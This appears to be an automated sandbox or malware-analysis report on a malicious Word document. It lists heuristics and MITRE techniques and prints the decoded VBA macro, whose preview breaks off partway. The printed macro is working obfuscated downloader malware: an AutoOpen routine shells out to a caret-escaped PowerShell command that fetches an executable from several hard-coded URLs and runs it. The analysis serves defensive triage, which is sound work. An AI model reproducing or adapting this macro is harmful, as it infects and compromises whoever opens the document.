Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing a VBA macro. An AutoOpen macro is present and attempts to execute a command via Shell. The macro is obfuscated, making it difficult to determine the exact command being executed. The presence of the AutoOpen macro together with the attempt to execute a command strongly suggests malicious intent, most likely to download and execute a second-stage payload.
Heuristics (5)

- ClamAV: Doc.Malware.00536d-6691462-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6691462-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: b75b17cfbe21736afbbd942ae691753e722a2d18f4fd9477a4d3edbf8e71e578) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5009 bytes |
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "JGrzSLnh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const UbJHpY = 0
Dim ZFpqa(5)
ZFpqa(0) = Mid(UrlzZV, 83, 143)
ZFpqa(1) = Mid(UrlzZV, 83, 143)
ZFpqa(2) = MidB(KwWLIYV, 2, 943)
ZFpqa(3) = Right(QzcsN, 271)
ZFpqa(4) = Right(QzcsN, 271)
Dim kPzzJ(2)
kPzzJ(0) = Left(mMIojQ, 128)
kPzzJ(1) = Right(QzcsN, 271)
Dim qLZzHV(4)
qLZzHV(0) = Right(QzcsN, 271)
qLZzHV(1) = Left(mMIojQ, 128)
qLZzHV(2) = Mid(UrlzZV, 83, 143)
qLZzHV(3) = Right(QzcsN, 271)
Dim XjvTX(3)
XjvTX(0) = Right(QzcsN, 271)
XjvTX(1) = Right(QzcsN, 271)
XjvTX(2) = Left(mMIojQ, 128)
Dim iMfkf(2)
iMfkf(0) = Mid(UrlzZV, 83, 143)
iMfkf(1) = Left(mMIojQ, 128)
Dim ZPajo(2)
ZPajo(0) = MidB(KwWLIYV, 2, 943)
ZPajo(1) = MidB(KwWLIYV, 2, 943)
Dim OBGcm(3)
OBGcm(0) = MidB(KwWLIYV, 2, 943)
OBGcm(1) = Right(QzcsN, 271)
OBGcm(2) = MidB(KwWLIYV, 2, 943)
Shell@ znTPdbX + mBYjUWTQKAI + oUCbzPVliID, UbJHpY
Dim PEDFPd(3)
PEDFPd(0) = Left(mMIojQ, 128)
PEDFPd(1) = Right(QzcsN, 271)
PEDFPd(2) = Mid(UrlzZV, 83, 143)
Dim zjjpiw(2)
zjjpiw(0) = MidB(KwWLIYV, 2, 943)
zjjpiw(1) = Left(mMIojQ, 128)
End Sub
Attribute VB_Name = "VjXpvlvYEoCNoI"
Function znTPdbX()
Dim iFQoTi(2)
iFQoTi(0) = Right(QzcsN, 271)
iFQoTi(1) = MidB(KwWLIYV, 2, 943)
Dim FBDjz(4)
FBDjz(0) = MidB(KwWLIYV, 2, 943)
FBDjz(1) = MidB(KwWLIYV, 2, 943)
FBDjz(2) = Left(mMIojQ, 128)
FBDjz(3) = Right(QzcsN, 271)
DErPCfhjTsT = Chr(Format(14 + 5 + 18 + 2 + 60)) + "md /V:/" + Chr(Format(9 + 3 + 12 + 1 + 42)) + Chr(Format(4 + 1 + 5 + 0 + 24)) + "s^" + "e^t ^x" + Chr(Format(9 + 3 + 12 + 1 + 42)) + "=^ ^ ^ ^" + " ^ ^ ^}^}{^h" + Chr(Format(14 + 5 + 18 + 2 + 60)) + "ta" + Chr(Format(14 + 5 + 18 + 2 + 60)) + "}^;k^" + "a^erb^;^zAz$" + " m^e^t^I-^ek^ovn^I^;)zA^" + "z^$ ,Em^d" + "^$(^eli^F^d^a^o^ln^woD^.v" + Chr(Format(9 + 3 + 12 + 1 + 42)) + "^Z" + "${^yrt^{)" + "u^p^i$" + " n^i^ E^md^$(h" + Chr(Format(14 + 5 + 18 + 2 + 60)) + "a" + "^ero^f^;^'^e^x^e.'^+jV"
Dim mbwsw(4)
mbwsw(0) = Mid(UrlzZV, 83, 143)
mbwsw(1) = Mid(UrlzZV, 83, 143)
mbwsw(2) = Mid(UrlzZV, 83, 143)
mbwsw(3) = Right(QzcsN, 271)
Dim rbLhE(3)
rbLhE(0) = Right(QzcsN, 271)
rbLhE(1) = Right(QzcsN, 271)
rbLhE(2) = Left(mMIojQ, 128)
Dim zfAfjO(4)
zfAfjO(0) = Right(QzcsN, 271)
zfAfjO(1) = Right(QzcsN, 271)
zfAfjO(2) = Mid(UrlzZV, 83, 143)
zfAfjO(3) = MidB(KwWLIYV, 2, 943)
Dim NRUzB(4)
NRUzB(0) = MidB(KwWLIYV, 2, 943)
NRUzB(1) = Left(mMIojQ, 128)
NRUzB(2) = Right(QzcsN, 271)
NRUzB(3) = Mid(UrlzZV, 83, 143)
QvImD = Chr(Format(14 + 5 + 18 + 2 + 60)) + "^$+^'\" + "^'+" + Chr(Format(14 + 5 + 18 + 2 + 60)) + "^i^l^bu^p:vne$" + "^=^zAz$;'8^62^' ^= jV" + Chr(Format(14 + 5 + 18 + 2 + 60)) + "^$^;" + ")^'@^'(t^il^pS^.^'I^4S^W^" + "7/mo" + Chr(Format(14 + 5 + 18 + 2 + 60)) + ".^xe^lfis^l^ume//" + "^:^pt^t^h^@" + "^WpIg7/e^d.^ekt^d^" + "e^ul^-greoj//^:^p^tth@3S^Z" + "Rj/^t^en" + ".in^ikr^b//:"
Dim duEiN(2)
duEiN(0) = Mid(UrlzZV, 83, 143)
duEiN(1) = Right(QzcsN, 271)
Dim JXKiZ(5)
JXKiZ(0) = Right(QzcsN, 271)
JXKiZ(1) = Left(mMIojQ, 128)
JXKiZ(2) = Mid(UrlzZV, 83, 143)
JXKiZ(3) = Right(QzcsN, 271)
JXKiZ(4) = Mid(UrlzZV, 83, 143)
Dim GRhuXt(5)
GRhuXt(0) = Right(QzcsN, 271)
GRhuXt(1) = Mid(UrlzZV, 83, 143)
GRhuXt(2) = MidB(KwWLIYV, 2, 943)
GRhuXt(3) = MidB(KwWLIYV, 2, 943)
GRhuXt(4) = Left(mMIojQ, 128)
vcEmwBYzcf = "p^tt^h@b^b0^L/mo" + Chr(Format(14 + 5 + 18 + 2 + 60)) + ".^p" + "u^org-" + "^dba^l^a//^:pt^t" + "h@^Dv^e/^m^o" + Chr(Format(14 + 5 + 18 + 2 + 60)) + ".^l" + "yd^yn^s//:pt^t^" + "h'^=u^p^i^$^;^tne^"
Dim XrTmE(5)
XrTmE(0) = Left(mMIojQ, 128)
XrTmE(1) = Mid(UrlzZV, 83, 143)
XrTmE(2) = MidB(KwWLIYV, 2, 943)
XrTmE(3) = MidB(KwWLIYV, 2, 943)
XrTmE(4) = Left(mMIojQ, 128)
Dim wQPlU(5)
wQPlU(0) = Mid(UrlzZV, 83, 143)
wQPlU(1) = Left(mMIojQ, 128)
wQPlU(2) = Left(mMIojQ, 128)
wQPlU(3) = MidB(KwWLIYV, 2, 943
```

... (truncated)